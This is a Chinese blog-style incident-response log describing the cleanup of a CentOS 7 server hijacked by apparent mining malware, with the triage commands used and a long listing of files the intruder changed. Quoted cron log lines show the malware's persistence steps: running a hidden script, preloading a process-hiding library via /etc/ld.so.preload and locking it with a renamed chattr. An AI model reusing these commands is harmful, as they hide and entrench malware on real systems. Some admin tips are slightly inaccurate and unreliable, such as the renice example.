记录一次linux centos7被hack的填坑记录-20201015

hacked的表象：top发现cpu占用100%，centos7的web应用访问缓慢

以下是零零散散的后续记录：
通过lastb发现massive的ssh可疑登陆，抓其中的典型，毙掉，如下：
firewall-cmd --permanent --zone=public --add-rich-rule="rule family="ipv4" source address="45.141.84.10" port protocol="tcp" port="40022" reject"
firewall-cmd --reload
firewall-cmd --list-all-zones
后来发现还有持续的ssh登陆，好吧直接关掉sshd，后续可以考虑加上fail2ban功能

关闭gui，减少资源消耗
systemctl get-default
systemctl set-default multi-user.target

附带的grub操作，请忽略之：
/etc/default/grub.cfg
GRUB_HIDDEN_TIMEOUT=0
GRUB_HIDDEN_TIMEOUT_QUIET=true
update-grub

可疑登陆，踢下线
pkill -kill -t pts/0

下面是找到可以进程的详细目录位置的方法：
通过ps及top命令查看进程信息时，只能查到相对路径，查不到的进程的详细信息，如绝对路径等。这时，我们需要通过以下的方法来查看进程的详细信息：
Linux在启动一个进程时，系统会在/proc下创建一个以PID命名的文件夹，在该文件夹下会有我们的进程的信息，其中包括一个名为exe的文件即记录了绝对路径，通过ll或ls –l命令即可查看。
ll /proc/PID
说明：
cwd符号链接的是进程运行目录；
exe符号连接就是执行程序的绝对路径；
cmdline就是程序运行时输入的命令行命令；
environ记录了进程运行时的环境变量；
fd目录下是进程打开或使用的文件的符号连接

查看seliunx的状态：
getenforce
sestatus
/etc/selinux/config

centos7下poweroff提示
PolicyKit daemon disconnected from the bus.
We are no longer a registered authentication agent.
网上找半天也没有答案，看到老外说是系统bug

下面netstat查看网络连接，没有输出（后来才发现netstat已经被替换成病毒程序了）
netstat -tplun

为了使正常的服务进程可以尽量恢复正常，在病毒占用cpu高的情况下，将相关的正常服务进程提高优先级不失为1个临时解决问题的好办法：
下面查找mysql的pid
pidof mysqld

top -p 某个pid查看特定pid

Linux系统进程的优先级取值：-20 到 19，数越大优先级越低。
可以通过top命令来查看，NI那一列。
改变进程的优先级的方法有两种：（需要root权限）
1、top命令
输入r，然后根据提示输入进程ID，再输入优先级数值。
2、renice命令
renice -n 2 -p 1234 （-n：后面是优先级的值；-p，是进程号）

将正常进程的优先级提高后，就需要着手删除可疑文件了，在删除可疑文件时最恶心的事情来了，发现删除不了，推测应该是给文件家里附加属性，在使用lsattr时发现找不到该命令，推测将lsattr改名了，好吧我也不知道你改了什么，直接如下安装e2fsprogs
centos7无法使用lsattr命令
yum -y install e2fsprogs

a5059bc002一直运行
[root@centos7 lib]# rm -f /usr/bin/a5059bc002
[root@centos7 lib]# touch /usr/bin/a5059bc002
[root@centos7 lib]# chattr +i /usr/bin/a5059bc002
[root@centos7 lib]# ls -l /usr/bin/a5059bc002
-rw-r--r-- 1 root root 0 10月 16 18:02 /usr/bin/a5059bc002
[root@centos7 lib]# lsattr /usr/bin/a5059bc002
----i----------- /usr/bin/a5059bc002

查看cron相关信息，查看可疑程序周期性运行
通过tail -f -n 300 /var/log/cron看到如下日志：

Oct 16 15:36:01 centos7 CROND[2204]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null)
Oct 16 15:36:01 centos7 CROND[2206]: (root) CMD ( echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1)
Oct 16 15:36:01 centos7 CROND[2205]: (root) CMD (/etc/sphp >/dev/null 2>&1)

可以看到chattr 被命名为lockr

可以看到规律的可执行文件在10月14 11:37存在问题需要通过find来查找出来

top可以看到占用cpu使用非常高的进程pid，然后less /proc/pid号/cmdline查看进程的具体位置
find / -type f -newermt '2020-10-14 11:00' ! -newermt '2020-10-14 12:00'

find / -type f -perm -111 -newermt '2020-10-14 11:00' ! -newermt '2020-10-14 12:00' 查找可执行文件

ls -lSh /usr/bin按照文件大小从大到小排列

-rwxr-xr-x 1 root root 30 10月 14 11:37 /bindu/phps
-rwxrwxrwx 1 root root 43 10月 14 11:37 /bindu/phpx
-rw-r--r-- 1 root root 370 10月 14 11:37 /etc/allow.bak
-rw-r--r--. 1 root root 782 10月 14 11:37 /etc/crontab
-rw-r--r-- 1 root root 460 10月 14 11:37 /etc/deny.bak
-rw-r--r--. 1 root root 568 10月 14 11:37 /etc/fstab
-rw-r--r-- 1 root root 541 10月 14 11:37 /etc/fstab.bak
-rw-r--r-- 1 root root 949 10月 14 11:37 /etc/group
---------- 1 root root 764 10月 14 11:37 /etc/gshadow
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /etc/passwd
-rw-r--r--. 1 root root 1.8K 10月 14 11:37 /etc/profile
-rwxrwxrwx 1 root root 188 10月 14 11:37 /etc/profile.d/php.sh
-rwxr-xr-x 1 root root 114 10月 14 11:38 /etc/profile.d/supervisor.sh
-rwxrwxrwx 1 root root 665K 10月 14 11:37 /etc/sphp
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /etc/spts
-rwxr-xr-x 1 root root 300 10月 14 11:38 /etc/.supervisor/conf.d/123.conf
-rw-r--r-- 1 root root 9.0K 10月 14 11:38 /etc/.supervisor/supervisord.conf
-rw-r--r--. 1 root root 515 10月 14 11:37 /etc/sysctl.conf
-rw------- 1 root root 381 10月 14 11:37 /root/.ssh/authorized_keys
-rwxr-xr-x 1 root root 2.0G 10月 14 11:37 /swapfile
-rwxr-xr-x 1 root root 409K 10月 14 11:37 /usr/bin/.bget
-rwxrwxrwx 1 root root 409K 10月 14 11:37 /usr/bin/dget
-rwxr-xr-x 1 root root 151K 10月 14 11:37 /usr/bin/dpkgd/lsof
-rwxrwxrwx 1 root root 152K 10月 14 11:37 /usr/bin/dpkgd/netstat
-rwxrwxrwx 1 root root 98K 10月 14 11:37 /usr/bin/dpkgd/ps
-rwxrwxrwx 1 root root 113K 10月 14 11:37 /usr/bin/dpkgd/ss
-rwxr-xr-x 1 root root 338 10月 14 11:37 /usr/bin/echo_supervisord_conf
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /usr/bin/.funzip
-rwxrwxrwx 1 root root 98K 10月 14 11:37 /usr/bin/ips
-rwxrwxrwx 1 root root 113K 10月 14 11:37 /usr/bin/iss
-rwxrwxrwx 1 root root 12K 10月 14 11:37 /usr/bin/lockr
-rwxrwxrwx 1 root root 12K 10月 14 11:38 /usr/bin/lockrc
-rwxrwxrwx 1 root root 12K 10月 14 11:37 /usr/bin/.locks
-rwxrwxrwx 1 root root 12K 10月 14 11:38 /usr/bin/.locksc
-rwxrwxrwx 1 root root 1.2M 10月 14 11:37 /usr/bin/longbak
-rwxrwxrwx 1 root root 152K 10月 14 11:37 /usr/bin/nets
-rwxrwxrwx. 1 root root 71 10月 14 11:37 /usr/bin/netstat
-rwxr-xr-x 1 root root 312 10月 14 11:37 /usr/bin/pidproxy
-rwxr-xr-x 1 root root 322 10月 14 11:37 /usr/bin/supervisorctl
-rwxr-xr-x 1 root root 318 10月 14 11:37 /usr/bin/supervisord
-rwxr-xr-x 1 root root 85 10月 14 11:37 /usr/lib/mysql/mysql
-rw-r--r-- 1 root root 238 10月 14 11:37 /usr/lib/python2.7/site-packages/easy-install.pth
-rw-r--r-- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/dependency_links.txt
-rw-r--r-- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/PKG-INFO
-rw-r--r-- 1 root root 291 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/SOURCES.txt
-rw-r--r-- 1 root root 6 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/top_level.txt
-rw-r--r-- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/zip-safe
-rw-r--r-- 1 root root 3.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/_compat.py
-rw-r--r-- 1 root root 4.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/_compat.pyc
-rw-r--r-- 1 root root 44K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/init.py
-rw-r--r-- 1 root root 45K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/init.pyc
-rw-r--r-- 1 root root 134 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/meld3.py
-rw-r--r-- 1 root root 346 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/meld3.pyc
-rw-r--r-- 1 root root 62K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/test_meld3.py
-rw-r--r-- 1 root root 66K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/test_meld3.pyc
-rwxrw-rw- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/dependency_links.txt
-rwxrw-rw- 1 root root 192 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/entry_points.txt
-rwxrw-rw- 1 root root 11 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/namespace_packages.txt
-rwxrw-rw- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/not-zip-safe
-rwxrw-rw- 1 root root 86K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/PKG-INFO
-rwxrw-rw- 1 root root 49 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/requires.txt
-rwxrw-rw- 1 root root 3.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/SOURCES.txt
-rwxrw-rw- 1 root root 11 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/top_level.txt
-rw-r--r-- 1 root root 2.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/childutils.py
-rw-r--r-- 1 root root 4.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/childutils.pyc
-rw-r--r-- 1 root root 154 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/confecho.py
-rw-r--r-- 1 root root 539 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/confecho.pyc
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/datatypes.py
-rw-r--r-- 1 root root 19K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/datatypes.pyc
-rw-r--r-- 1 root root 18K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/dispatchers.py
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/dispatchers.pyc
-rw-r--r-- 1 root root 6.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/events.py
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/events.pyc
-rw-r--r-- 1 root root 6.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http_client.py
-rw-r--r-- 1 root root 9.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http_client.pyc
-rw-r--r-- 1 root root 31K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http.py
-rw-r--r-- 1 root root 28K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http.pyc
-rw-r--r-- 1 root root 56 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/init.py
-rw-r--r-- 1 root root 256 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/init.pyc
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/loggers.py
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/loggers.pyc
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asynchat_25.py
-rw-r--r-- 1 root root 9.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asynchat_25.pyc
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asyncore_25.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asyncore_25.pyc
-rw-r--r-- 1 root root 4.8K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/auth_handler.py
-rw-r--r-- 1 root root 4.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/auth_handler.pyc
-rw-r--r-- 1 root root 1.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/counter.py
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/counter.pyc
-rw-r--r-- 1 root root 6.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/default_handler.py
-rw-r--r-- 1 root root 5.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/default_handler.pyc
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/filesys.py
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/filesys.pyc
-rw-r--r-- 1 root root 3.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_date.py
-rw-r--r-- 1 root root 3.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_date.pyc
-rw-r--r-- 1 root root 29K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_server.py
-rw-r--r-- 1 root root 26K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_server.pyc
-rw-r--r-- 1 root root 121 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/init.py
-rw-r--r-- 1 root root 297 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/init.pyc
-rw-r--r-- 1 root root 7.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/logger.py
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/logger.pyc
-rw-r--r-- 1 root root 2.8K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/medusa_gif.py
-rw-r--r-- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/medusa_gif.pyc
-rw-r--r-- 1 root root 7.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/m_syslog.py
-rw-r--r-- 1 root root 4.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/m_syslog.pyc
-rw-r--r-- 1 root root 8.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/producers.py
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/producers.pyc
-rw-r--r-- 1 root root 9.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/status_handler.py
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/status_handler.pyc
-rw-r--r-- 1 root root 2.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/xmlrpc_handler.py
-rw-r--r-- 1 root root 4.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/xmlrpc_handler.pyc
-rw-r--r-- 1 root root 80K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/options.py
-rw-r--r-- 1 root root 71K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/options.pyc
-rw-r--r-- 1 root root 1.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/pidproxy.py
-rw-r--r-- 1 root root 3.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/pidproxy.pyc
-rw-r--r-- 1 root root 6.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/poller.py
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/poller.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/process.py
-rw-r--r-- 1 root root 29K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/process.pyc
-rw-r--r-- 1 root root 35K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/rpcinterface.py
-rw-r--r-- 1 root root 32K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/rpcinterface.pyc
-rwxrw-rw- 1 root root 779 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_eventgen.py
-rw-r--r-- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_eventgen.pyc
-rwxrw-rw- 1 root root 716 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_listener.py
-rw-r--r-- 1 root root 957 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_listener.pyc
-rwxrw-rw- 1 root root 562 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_commevent.py
-rw-r--r-- 1 root root 985 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_commevent.pyc
-rwxrw-rw- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_eventlistener.py
-rw-r--r-- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_eventlistener.pyc
-rwxrw-rw- 1 root root 1.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_exiting_eventlistener.py
-rw-r--r-- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_exiting_eventlistener.pyc
-rwxrw-rw- 1 root root 9.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/skel/sample.conf
-rw-r--r-- 1 root root 3.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/socket_manager.py
-rw-r--r-- 1 root root 5.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/socket_manager.pyc
-rw-r--r-- 1 root root 1.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/states.py
-rw-r--r-- 1 root root 2.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/states.pyc
-rw-r--r-- 1 root root 48K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisorctl.py
-rw-r--r-- 1 root root 46K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisorctl.pyc
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisord.py
-rw-r--r-- 1 root root 14K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisord.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/base.py
-rw-r--r-- 1 root root 58K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/base.pyc
-rwxrw-rw- 1 root root 425 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/donothing.conf
-rwxrw-rw- 1 root root 125 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/spew.py
-rw-r--r-- 1 root root 321 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/spew.pyc
-rwxrw-rw- 1 root root 185 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/unkillable_spew.py
-rw-r--r-- 1 root root 405 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/unkillable_spew.pyc
-rw-r--r-- 1 root root 20 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/init.py
-rw-r--r-- 1 root root 175 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/init.pyc
-rw-r--r-- 1 root root 5.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_childutils.py
-rw-r--r-- 1 root root 8.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_childutils.pyc
-rw-r--r-- 1 root root 540 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_confecho.py
-rw-r--r-- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_confecho.pyc
-rw-r--r-- 1 root root 27K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_datatypes.py
-rw-r--r-- 1 root root 53K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_datatypes.pyc
-rw-r--r-- 1 root root 48K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_dispatchers.py
-rw-r--r-- 1 root root 51K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_dispatchers.pyc
-rw-r--r-- 1 root root 21K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_events.py
-rw-r--r-- 1 root root 27K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_events.pyc
-rw-r--r-- 1 root root 25K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_http.py
-rw-r--r-- 1 root root 38K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_http.pyc
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_loggers.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_loggers.pyc
-rw-r--r-- 1 root root 130K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_options.py
-rw-r--r-- 1 root root 139K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_options.pyc
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_poller.py
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_poller.pyc
-rw-r--r-- 1 root root 89K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_process.py
-rw-r--r-- 1 root root 96K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_process.pyc
-rw-r--r-- 1 root root 95K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_rpcinterfaces.py
-rw-r--r-- 1 root root 86K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_rpcinterfaces.pyc
-rw-r--r-- 1 root root 7.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_socket_manager.py
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_socket_manager.pyc
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_states.py
-rw-r--r-- 1 root root 4.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_states.pyc
-rw-r--r-- 1 root root 67K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisorctl.py
-rw-r--r-- 1 root root 94K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisorctl.pyc
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisord.py
-rw-r--r-- 1 root root 25K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisord.pyc
-rw-r--r-- 1 root root 6.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_web.py
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_web.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_xmlrpc.py
-rw-r--r-- 1 root root 51K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_xmlrpc.pyc
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_refresh.gif
-rwxrw-rw- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_restart.gif
